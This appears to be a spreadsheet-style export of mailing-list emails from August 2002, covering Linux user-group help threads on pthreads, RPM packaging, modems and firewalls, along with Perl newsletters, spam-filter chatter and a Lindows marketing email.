    <t>On Tuesday, August 20, 2002, at 07:23  AM, Justin Mason wrote:\n\n&gt;&gt; The compensate rule USER_AGENT should go or at least score \n&gt;&gt; very low; with\n&gt;&gt; it, a spammer just has to include a header like\n&gt;\n&gt; BTW, the scores are irrelevant right now (unless the test is \n&gt; going to have\n&gt; a non-GA'd score).  The GA should reduce "easy" ones, and if it \n&gt; doesn't,\n&gt; after the GA run is the time to comment.  Don't pay any \n&gt; attention to them!\n&gt; ;)\n\nRemember that the GA is going to be considering combinatorial \nuses of the rules, so rules which look dodgy on their own might \nbe gems for the GA -- perhaps something with a S/O ratio of .5 \nactually occurs often in combination with some other rule, and \nin those situations, helps to distinguish spam vs nonspam.\n\nC\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ilug@linux.ie'" &lt;ilug@linux.ie&gt;\nFrom: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;\nDate: Tue, 20 Aug 2002 11:02:32 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 11:02:32 +0100</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----\n&gt; From: Vincent Cunniffe [mailto:vincent@cunniffe.net]\n&gt; Sent: 20 August 2002 10:43\n&gt; To: ilug\n&gt; Subject: Re: [ILUG] linux pthreads problem\n&gt; \n&gt; Padraig Brady wrote:\n&gt; &gt; Vincent Cunniffe wrote:\n&gt; &gt;\n&gt; &gt;&gt;\n&gt; &gt;&gt; Possibly. However, the amount of memory in use is stupid :\n&gt; &gt;&gt;\n&gt; &gt;&gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.\n&gt; &gt;&gt;\n&gt; &gt;&gt; Then I stop those threads, and the usage stays there. I start another\n&gt; 50\n&gt; &gt;&gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither\n&gt; &gt;&gt; freeing the resources correctly nor reusing them :-/\n&gt; &gt;&gt;\n&gt; &gt;&gt; I've found several other people seeing the same VSZ issue with\n&gt; pthreads,\n&gt; &gt;&gt; spread over a long time, but no solution as yet.\n&gt; &gt;\n&gt; &gt;\n&gt; &gt; Err, Is your code fixed now?\n&gt; &gt; You need a seperate pthread_t per thread.\n&gt; \n&gt; I've tested it with and without separate pthread_t's, and the problem is\n&gt; identical, unfortunately.\n&gt; \n&gt; Regards,\n&gt; \n&gt; Vin\n&gt; \n&gt; \n&gt; --\n&gt; Irish Linux Users' Group: ilug@linux.ie\n&gt; [URL]http://www.linux.ie[/URL] for (un)subscription\n&gt; information.\n&gt; List maintainer: listmaster@linux.ie\n\nAre you using pthread_join(somethread,0);\nWhen you are closing off your instanciated thread made from\npthread_t*somethread ?\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Harri Haataja &lt;harri.haataja@cs.helsinki.fi&gt;\nDate: Tue, 20 Aug 2002 10:52:08 +0300</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:52:08 +0300</t>
  </si>
  <si>
    <t>Re: Portable RPMs</t>
  </si>
  <si>
    <t>On Fri, Aug 16, 2002 at 07:58:07PM +0200, Torsten Bronger wrote: &gt; If I create an RPM according to one of the how-to's with having Red &gt; Hat in mind, how big are my chances that it will also work for the &gt; SuSE distribution, or others?  (I don't know how many base on the RPM &gt; system.) &gt; Or what must I pay attention to when creating an RPM that should work &gt; with the big distributions? Note also that there's hope of rpm being used on other systems than Linux. Look at [URL]http://www-1.ibm.com[/URL] I think a good way to guess is to look at others' spec files, hardcode as little as possible, replace abolute paths and commands with macros if possible and accept and request patches and suggestions :) --  Designing in C, I find myself utilizing the Harley Davidson Design Principle: "If it breaks, make it bigger. If it sticks out, chrome it!" :-) 		-- Marin David Condic, comp.lang.ada _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www-1.ibm.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: ilug &lt;ilug@linux.ie&gt;\nFrom: Vincent Cunniffe &lt;vincent@cunniffe.net&gt;\nDate: Tue, 20 Aug 2002 10:43:00 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:43:00 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG] linux pthreads problem</t>
  </si>
  <si>
    <t>Padraig Brady wrote:\n&gt; Vincent Cunniffe wrote:\n&gt; \n&gt;&gt;\n&gt;&gt; Possibly. However, the amount of memory in use is stupid :\n&gt;&gt;\n&gt;&gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.\n&gt;&gt;\n&gt;&gt; Then I stop those threads, and the usage stays there. I start another 50\n&gt;&gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither\n&gt;&gt; freeing the resources correctly nor reusing them :-/\n&gt;&gt;\n&gt;&gt; I've found several other people seeing the same VSZ issue with pthreads,\n&gt;&gt; spread over a long time, but no solution as yet.\n&gt; \n&gt; \n&gt; Err, Is your code fixed now?\n&gt; You need a seperate pthread_t per thread.\n\nI've tested it with and without separate pthread_t's, and the problem is\nidentical, unfortunately.\n\nRegards,\n\nVin\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'mconway35@eircom.net'" &lt;mconway35@eircom.net&gt;, ilug@linux.ie\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Tue, 20 Aug 2002 10:38:52 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:38:52 +0100</t>
  </si>
  <si>
    <t>"'mconway35@eircom.net'" &lt;mconway35@eircom.net&gt;, ilug@linux.ie</t>
  </si>
  <si>
    <t>RE: [ILUG] Newbie Questions</t>
  </si>
  <si>
    <t>Yo Mark,\n\nHave you goten the closed source drivers from Nvidia or are you still using\nthe wans that came with Redbum? \n\n[URL]http://www.nvidia.com[/URL] and then somewhere...somwhere-else...\n\nInstallation is WELL detailed, you should see the NV splash screen, don;t\nforget to edit the config files.\n\nCW\n\n\n--------------------------------------\nHi\n\nI have just installed Red Hat 7.2 on my desktop machine. I am completely new\nto Linux and therefore have run into a few problems.\n\nThe graphic display on my PC doesnt seem to work. My monitor is slightly\nmiss-aligned and I cannot run any high resolution games ( everything freezes\n). In the hardware browser in Gnome it lists my Graphics Card (Riva TNT2),\nand shows installed drivers...... maybe the problem lies elswhere.\n\nAnother problem I have is that I cannot install my ISDN, USB modem ( LASAT\nSpeed Basic ), however im pretty sure its not supported by Linux, but again\nit is featured in the Hardware Browser, without installed drivers.\n\nIf anybody has any ideas, please let me know cos id like to use Linux more.\nPlease keep in mind I am new to it though.\n\nThanks\n\nMark\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.nvidia.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: Vincent Cunniffe &lt;vincent@cunniffe.net&gt;\nFrom: Padraig Brady &lt;padraig.brady@corvil.com&gt;\nDate: Tue, 20 Aug 2002 10:37:23 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:37:23 +0100</t>
  </si>
  <si>
    <t>Vincent Cunniffe wrote:\n&gt; \n&gt; Possibly. However, the amount of memory in use is stupid :\n&gt; \n&gt; I start 50 threads, and the memory usage goes up to 411436 VSZ/840 RSS.\n&gt; \n&gt; Then I stop those threads, and the usage stays there. I start another 50\n&gt; threads, and the usage goes up to 821036 VSZ/1040 RSS. So, it's neither\n&gt; freeing the resources correctly nor reusing them :-/\n&gt; \n&gt; I've found several other people seeing the same VSZ issue with pthreads,\n&gt; spread over a long time, but no solution as yet.\n\nErr, Is your code fixed now?\nYou need a seperate pthread_t per thread.\n\nPdraig.\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'Colin Nevin'" &lt;colin_nevin@yahoo.com&gt;, ilug@linux.ie\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Tue, 20 Aug 2002 10:31:53 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:31:53 +0100</t>
  </si>
  <si>
    <t>"'Colin Nevin'" &lt;colin_nevin@yahoo.com&gt;, ilug@linux.ie</t>
  </si>
  <si>
    <t>RE: [ILUG] staroffice 6.0 installation freezes under RH7.3</t>
  </si>
  <si>
    <t>No problems installing OpenOffice 653??? and 1.0. Had some issues with bz2's\nbeing corrupted but fixed when downloaded again. \n\nI am downloading the src of 1.01 at the mo to se if it will work any faster\ncompiled for my architecture. \n\nRegards,\nCW\n\n------------\nHi All,\n\nJust wondering if anyone has ever installed StarOffice\n6.0 (or Open Office), and if any have experienced any\nproblems with the install freezing ?\n\nI'm using RedHat 7.3 kernel 2.4.18-3, and glibc 2.2.5\n?\n\nI might try downloading OpenOffice instead if it is\nunresolved!!!!\n\nCheers all,\n\nColin\n\n\n__________________________________________________\nDo You Yahoo!?\nEverything you'll ever need on one web page\nfrom News and Sport to Email and Music Charts\n[URL]http://uk.my.yahoo.com[/URL]\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "'mconway35@eircom.net'" &lt;mconway35@eircom.net&gt;, ILUG@linux.ie\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Tue, 20 Aug 2002 10:29:19 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:29:19 +0100</t>
  </si>
  <si>
    <t>"'mconway35@eircom.net'" &lt;mconway35@eircom.net&gt;, ILUG@linux.ie</t>
  </si>
  <si>
    <t>RE: [ILUG] RE: Newbie Question</t>
  </si>
  <si>
    <t>Yes, the lasat speed basic sucks-ass.com, it won't work coz its from eircon\nwho are shite. \n\nI have two of em sitting in my drawer of "might have a use some day or\nother"...\n\nGet yourself an el-cheapo ISDN card, 50 yoyo's will usually suffice. I have\na TRUST load a crap HFC based one which has been trodding along nicely for\nyonks. Gets detected automagically by pretty much ANY distro, has kernel\nsupport for a million years or so. \n\nLater,\nCW\n\np.s.: you other modems are probably winmodems and are a pain in ze arse.com,\nthey will work with lots of poking but not worth the effort IMHO. Just use\nISDN and NAT it.\n\n\n-----------------\nRegarding:\nAnother problem I have is that I cannot install my ISDN, USB modem ( LASAT\nSpeed Basic ), however im pretty sure its not supported by Linux, but again\nit is featured in the Hardware Browser, without installed drivers.\n\nThanks for your replies.... However i still cant get it to detect the\nExternal USB modem. I also have an internal 56k fax modem, but i cannot get\nthat detected either ( maybe its because it was designed for Windows and is\nnot supported ). Im not going to buy a new modem ( I think 2 is more than\nenough for 1 PC ).\n\nIt could well be my inexperience with Linux that is making this more\ndifficult, but whatever it is iv just about had enough!! Any last gasp ideas\nwould be welcome\n\nMany Thanks\n\nMark\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Fox" &lt;lds0062@cdc.net&gt;\nDate: Tue, 20 Aug 2002 10:23:52 -0400</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:23:52 -0400</t>
  </si>
  <si>
    <t>Re: [Razor-users] Upgraded to Razor 2.14</t>
  </si>
  <si>
    <t>I just want to say - RAZOR v2 ROCKS!  Under Razor v1, we were doing good to\ndetect 20% of our spam with Razor.  I have only had it running since last\nnight, but it is detecting a whopping 63%!  Of course I would like to see\nthat number climb higher eventually, but that is a very big improvement!\n\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;ilug-admin@linux.ie&gt;, &lt;ilug@linux.ie&gt;\nFrom: "Ciaran Mac Lochlainn" &lt;ciaran17@eircom.net&gt;\nDate: Tue, 20 Aug 2002 10:14:59 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:14:59 +0100</t>
  </si>
  <si>
    <t>&lt;ilug-admin@linux.ie&gt;, &lt;ilug@linux.ie&gt;</t>
  </si>
  <si>
    <t>is it really necessary to send these to the list? ----- Original Message ----- From:  To:  Sent: Tuesday, August 20, 2002 8:54 AM Subject: [ILUG] Mail sent to ILUG &gt; Your mail to 'ILUG' with the subject: &gt; &gt;     Audio plays a critical part in the Web surfer's consciousness rvxa &gt; &gt; Is being held until the list moderator can review it for approval. &gt; &gt; The reason it is being held: &gt; &gt;     Suspicious header &gt; &gt; Either the message will get posted to the list, or you will receive &gt; notification of the moderator's decision. &gt; &gt; -- &gt; Irish Linux Users' Group: ilug@linux.ie &gt; [URL]http://www.linux.ie[/URL] for (un)subscription information. &gt; List maintainer: listmaster@linux.ie &gt; --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Dave Wilson &lt;dave.wilson@heanet.ie&gt;, webdev@linux.ie\nFrom: Donncha O Caoimh &lt;donncha.ocaoimh@tradesignals.com&gt;\nDate: Tue, 20 Aug 2002 10:02:52 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 10:02:52 +0100</t>
  </si>
  <si>
    <t>Dave Wilson &lt;dave.wilson@heanet.ie&gt;, webdev@linux.ie</t>
  </si>
  <si>
    <t>Re: [Webdev] PHP+Javascript request</t>
  </si>
  <si>
    <t>Kate asked about this several months ago, and I posted some code and hints on \nhow to work around this problem. AFAIR, you simply refer to the form elements \nby their names, including brackets, but put " or ' around them, ie:\n\nval = "document.form.city[1]";\n\nI think that works, there's an answer to this question on [URL]http://faqts.com[/URL] \nwhere I got the original answer.\n\nDonncha.\n\nOn Monday 19 August 2002 18:28, Dave Wilson wrote:\n&gt; &gt; er, i understood you until you reached the above. Maybe its my lack of\n&gt; &gt; PHP but why would a variable name _need_ to end with [] ?\n&gt; &gt;\n&gt; &gt; With most languages you parse the submitted form data and should come\n&gt; &gt; out with either variables or an array / hash, which you then work with\n&gt; &gt; and name whatever you like.\n&gt;\n&gt; IIRC, if the query string contains\n&gt;\n\n_______________________________________________\nWebdev mailing list\nWebdev@linux.ie\n[URL]http://www.linux.ie[/URL]</t>
  </si>
  <si>
    <t>http://faqts.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: "'Con Hennessy'" &lt;CP.Hennessy@iname.com&gt;, ilug@linux.ie\nFrom: "Wynne, Conor" &lt;conor_wynne@maxtor.com&gt;\nDate: Tue, 20 Aug 2002 09:54:29 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 09:54:29 +0100</t>
  </si>
  <si>
    <t>"'Con Hennessy'" &lt;CP.Hennessy@iname.com&gt;, ilug@linux.ie</t>
  </si>
  <si>
    <t>RE: [ILUG] ADSL, routers and firewalls</t>
  </si>
  <si>
    <t>I'm configuring this at the moment. -&gt; Still ;--)\n\nI found out that my firewall box has a dodgy USB and so I'm awaiting a\nPCI-USB controller to finish the configuration. I meant to buy one yesterday\nand forgot. I've bought Smoothwall Corporate edition as its the best\nfirewall/routing solution around or so I've been led to believe. \n\nWill be doing NAT/Proxy/firewall, maybe VPN too but we shall see. \n\nCW\n\n-----------\nHi all,\n	I am seriously thinking of getting the ADSL "solo" connection\nfrom Eircom. I also have more than one computer therefore I need a router\nso that I can connect them together.\nThe 2 options I am looking at are : \n  the ADSL usb modem connected to my linux machine, with the linux\n	machine acting as firewall; and\n  a combined router / firewall box which would be connected directly\n	to the ADSL modem.\n\nSo my questions are : \n	what recommendations would any of you have about the above ?\n	do I need to have NAT (I have only a vague idea of what this does )?\n	what other options should I be looking at ?\n\nThanks\nCon\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Tue, 20 Aug 2002 08:55:17 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 08:55:17 +0200 (CEST)</t>
  </si>
  <si>
    <t>Re: sprint delivers the next big thing??</t>
  </si>
  <si>
    <t>On Mon, 19 Aug 2002, Joseph S. Barrera III wrote:\n\n&gt; In fact, with a 1GB microdrive in my camera, I often just keep\n&gt; old pictures around, and I can show people pictures using the\n&gt; camera's display. Which is bound to be better than the cell phone's.\n\nA detachable clip-on eyepiece display could be arbitrarily high-res. Now\nthat we see first OLED prototypes (cheap, can be printed on curved\nsurfaces resulting in cheaper optics) it can't be more than 5 years off.\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Mark Derricutt &lt;mark@talios.com&gt;\nDate: Tue, 20 Aug 2002 07:41:57 +1200</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 07:41:57 +1200</t>
  </si>
  <si>
    <t>Re: rpm versioning done right?</t>
  </si>
  <si>
    <t>This seems to be a good argument for the odd number prerelease, even number  stables. So instead of a 0.61pre2 pre3,  and a 0.61final,  you'd stick with 0.61  with different releases, and a 0.62. 0.61-1, 0.61-2, 0.62.  Would that that? --On Monday, August 19, 2002 17:25:04 +0200 Matthias Saou   wrote: &gt; Take for instance xmame : I've been packaging 0.61 pre-releases as &gt; "0.61-fr0.x" since the entire source has only "0.61" tags everywhere, no &gt; preversion tags whatsoever.                                     -- \m/ --   "...if I seem super human I have been misunderstood." (c) Dream Theater          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: iiu@taint.org\nFrom: Bernie Goldbach &lt;stripes@iol.ie&gt;\nDate: Tue, 20 Aug 2002 07:12:30 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 07:12:30 +0100</t>
  </si>
  <si>
    <t>Bernie Goldbach &lt;stripes@iol.ie&gt;</t>
  </si>
  <si>
    <t>Re: [IIU] Recommendations on phone / pda+phone + European GPRS coverage info.</t>
  </si>
  <si>
    <t>Hi,\n\nI believe you get more value for money by separating the mobile phone from \nthe PDA.\n\nAs expressed by power users on Open, a combination like a EUR 160 Nokia \n6310i talking to a EUR 440 Palm m515 will meet your specification. By using \na EUR 90 Bluetooth SD chip, the Palm and the Nokia 6310i can talk to one \nanother even when not in line of sight.\n\nregards\nBernie\n\n[URL]www.topgold.com[/URL]\n\n\n_______________________________________________\nIIU mailing list\nIIU@iiu.taint.org\n[URL]http://iiu.taint.org[/URL]</t>
  </si>
  <si>
    <t>www.topgold.com http://iiu.taint.org</t>
  </si>
  <si>
    <t>AUT</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Brian Fahrlander &lt;kilroy@kamakiriad.com&gt;\nDate: Tue, 20 Aug 2002 06:13:52 -0500</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 06:13:52 -0500</t>
  </si>
  <si>
    <t>On Mon, 19 Aug 2002 16:44:30 +0200, Matthias Saou  wrote: [snipped] &gt; Then why bother : The new Red Hat Linux beta "(null)" is now available and &gt; should be announced anytime now. It contains rpm 4.1-0.81. &gt;  &gt; You can grab it from here : &gt; ftp://ftp.freshrpms.net/pub/redhat/linux/beta/null/     What's the official "apt" line for it?  Is it just 7.4 instead of 7.3, or did they make this one 8.0?   ------------------------------------------------------------------------ Brian Fahrlnder              Linux Zealot, Conservative, and Technomad Evansville, IN                    My Voyage: [URL]http://www.CounterMoon.com[/URL] ICQ  5119262 ------------------------------------------------------------------------ I've been complaining for years, and almost no one listened. "Windows is just easier" you said. "I don't want to learn anything new", you said. Tell me how easy THIS is: [URL]http://www.guardian.co.uk[/URL],4273,4477138,00.html _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: CDale &lt;cdale@techmonkeys.net&gt;\nDate: Tue, 20 Aug 2002 04:02:03 -0500 (CDT)</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 04:02:03 -0500 (CDT)</t>
  </si>
  <si>
    <t>Snag Ware</t>
  </si>
  <si>
    <t>We were sitting here talking about Opera, and the fact that it's not free \nanymore (unless you want the scrollypollies),  and how that sucked and \nstuff, and someone said something about  nagware, and I misinterpretted it \nas snag ware, which mainly means, oh  yeh, right, I'm gonna buy this \n-eyeroll- where's someone with a key?  LOL  So who is it again who's on \nthis list who's associated with Opera?  Why's the free one using the same \nLAME idea netzero, etc useD?   I know what kind of  costs are involved in \ncreating software like this, and I understand everyone needs to eat, but \nif someone can get netscape for free, and opera isn't free, then, hmmm...  \nI imagine this email is going to bring some bricks down on my head, but \nwell, go for it, I gots my helmet.  (:\nCindy\nP.S. GregB, you there?  (:\n\n-- \n"I don't take no stocks in mathematics, anyway" --Huckleberry Finn\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 20 Aug 2002 02:00:28 +0000</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 02:00:28 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-08-20</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * Call for Perl Monger T-Shirts at YAPC::Europe\n    * This Week on perl5-porters (11-18 August 2002)\n\n+--------------------------------------------------------------------+\n| Call for Perl Monger T-Shirts at YAPC::Europe                      |\n|   posted by ziggy on Monday August 19, @08:53 (yapce)              |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n[0]neophyte writes "If you come to YAPC::Europe 2002, and you are a\nmember of a Perlmonger group, and your group has its own t-shirts, then\nplease bring one to YAPC::Europe for the auction. Show off the creativity\nof your group and give someone else the chance to have such a nice\nt-shirt as yours."\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. mailto:niederrhein-pm@web.de\n\n\n+--------------------------------------------------------------------+\n| This Week on perl5-porters (11-18 August 2002)                     |\n|   posted by pudge on Monday August 19, @10:12 (summaries)          |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\n&gt;&gt;From sunny and hot and about to burst out in thunderstorms, downtown\nEcht, comes this weeks perl5-porters summary, brought to you by Elizabeth\nMattijsen.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.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 http://use.perl.org http://use.perl.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 20 Aug 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 02:00:22 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-08-20</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nCall for Perl Monger T-Shirts at YAPC::Europe\n    posted by ziggy on Monday August 19, @08:53 (yapce)\n    [URL]http://use.perl.org[/URL]\n\nThis Week on perl5-porters (11-18 August 2002)\n    posted by pudge on Monday August 19, @10:12 (summarie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rpm-zzzlist@freshrpms.net\nFrom: Matthias Saou &lt;matthias@egwn.net&gt;\nDate: Tue, 20 Aug 2002 01:00:02 +0200</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 01:00:02 +0200</t>
  </si>
  <si>
    <t>Once upon a time, Harig, wrote : &gt; Actually, I was hoping that you could answer the question "how can we  &gt; override an existing switch?"  For example, %configure uses the command- &gt; line switch '--prefix'.  How can we override that value? &gt;  &gt;   %configure ??? Quite honestly, I thought that the last occurrence was the one that counted. I'm almost sure I've already done something like : %configure --bindir=%{_sbindir} or even %configure --sysconfdir=%{_sysconfdir}/%{name} Are you sure that it was the first for you? Maybe you're forgetting to also override it in %makeinstall like follows : %makeinstall bindir=%{buildroot}%{_sbindir} or even %makeinstall sysconfdir=%{buildroot}%{_sysconfdir}/%{name} Is that it? Matthias --  Matthias Saou                                World Trade Center -------------                                Edificio Norte 4 Planta System and Network Engineer                  08039 Barcelona, Spain Electronic Group Interactive                 Phone : +34 936 00 23 23 _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Anthony &lt;ant@elivefree.net&gt;, ilug@linux.ie\nFrom: Michael Conry &lt;michael.conry@ucd.ie&gt;\nDate: Tue, 20 Aug 2002 00:45:46 +0100</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 00:45:46 +0100</t>
  </si>
  <si>
    <t>Michael Conry &lt;michael.conry@ucd.ie&gt;</t>
  </si>
  <si>
    <t>Anthony &lt;ant@elivefree.net&gt;, ilug@linux.ie</t>
  </si>
  <si>
    <t>On 0020 +0100 %{!Mon, Aug 19, 2002 at 11:30:12PM +0100}, Anthony wrote:\n&gt; to the net. However, I didn't realise that Windows altered the hw clock\n&gt; as there was no mention of it in any of the docs I read. \n&gt; I still dual-boot on a regular basis and if Windows is sneakily messing\n&gt; with the clock, I'd be interested to know in what way it is and how it\n&gt; couild be stopped from doing so.\nIn my experience Windows will change the hardware clock the first time\nyou boot into it after the clocks have gone forward/back an hour.  This\nwill only happen twice a year. How to stop it, I have not checked (I\njust switch the clock back an hour from within windows after such a\nreboot).  Is there a GMT windows timezone?\n\nWith ntp, it is a big no-no (afaik) to have other programs messing with\nthe clock as it will put ntp's calculations of drift etc., out. (maybe\nthis only applies to chrony, which is what I use).  If the windows\nchange only moves forward an hour, and you shift back an hour, maybe ntp\nwill be (relatively) ok (depends if all the remaining digits of time\nprecision are left unchanged, probably they aren't exactly).\nm\n-- \nMichael Conry   Ph.:+353-1-7161987, Web: [URL]http://www.acronymchile.com[/URL]\nKey fingerprint = 5508 B563 6791 5C84 A947  CB01 997B 3598 09DE 502C\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.acronymchile.com http://www.linux.ie</t>
  </si>
  <si>
    <t>FIN</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Tue, 20 Aug 2002 00:25:11 -0400</t>
  </si>
  <si>
    <t>Tue, 20 Aug 2002 00:25:11 -0400</t>
  </si>
  <si>
    <t>Spam nostalgia, Annoyance Calls, good ideas with no analysis</t>
  </si>
  <si>
    <t>Am I going to long for the good old days of Nigerian 419?\n\nAfter picking up the land-line phone mid-day (always a bad idea) only to \nslam it down before the telemarketer even spoke, I have in mind an \ninvention.  If my brain can detect the crosstalk from a call-center before \nthe human, sub-human, or machine starts speaking, why not have a box that \njust hangs up for me?  Maybe it could blow a police whistle (play a \nsample) into the phone first.\n\nCurrently, a strategy of leaving the machine on as a screener works pretty \nwell, but I still get Carey-on-RIAA style mad when the damn phone rings \nand it's NOT anyone I want to talk to.\n\n.....\n\nI want to like Spider Robinson's works.  Really.  I mean having a "Bridge \nof Birds" attraction in the "China that never was" portion of the theme \npart in "The Free Lunch...."   But, I really fell for his anti-paparatzi \ndevice (invented by a princess Diana fan).   Doggone.  I've now completely \nreasoned my way around it.  It has a built-in defense against the first \nobvious way of confounding it, but that leads directly to an exploit that \nuses off the shelf hardware that a paparatzi ought to have in her kit.\nThat's so often the problem with Robinson.  He doesn't think that you the \nreader are nearly so smart as he.  Heh.   I admit that reading a lot of \nslushpile manuscripts does not improve one's opinion of fellow-man, but\nI always resent him for not being thorough.\n\nEirikur\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Xxxxxxxxx.Yyyyyyy@web.de\nFrom: "Michael Robertson" &lt;michaelr@lindows.com&gt;\nDate: Tue, 2 Jul 2002 16:54:22 -0800</t>
  </si>
  <si>
    <t>Tue, 2 Jul 2002 16:54:22 -0800</t>
  </si>
  <si>
    <t>Lindows.com: Michael's Minute: Do the Math...Dispel the Myths</t>
  </si>
  <si>
    <t>------=_LINDOWS_6a72a16a171d3ceefdc7477961871f6d Content-Type: text/plain; 	charset="us-ascii" Content-Transfer-Encoding: 7bit If this message is not displaying properly, click here  to launch it in your browser.   Michael's Minute: Do the Math...Dispel the Myths  A reporter came by the Lindows.com   offices last Friday. He told me that he wanted to try and use  LindowsOS to write a story, but he didn't think it was possible because his office used Microsoft Word .doc files. I asked him to have a seat and watch.   I turned on the Walmart.com  computer and then clicked on the running man   which took me to the Click-N-Run Warehouse   where I installed OpenOffice   using Click-N-Run. I then clicked the "Run It"  button which opened the word processor OpenOffice Writer. I then typed "Linux is ready for the desktop and consumers can save hundreds using LindowsOS." I selected "Save as Microsoft Word." The reporter was not only surprised, he was amazed. Like many reporters, he was under the impression that Linux was only for servers. The simple word processor demonstration went a long way to show him otherwise. For Linux to become a driving force in desktop computing it will have to overcome a couple of myths.  The first myth is that Linux is too hard to install and configure. That may have been true in the past, but we've annihilated this myth with the latest version of LindowsOS --which installs on most 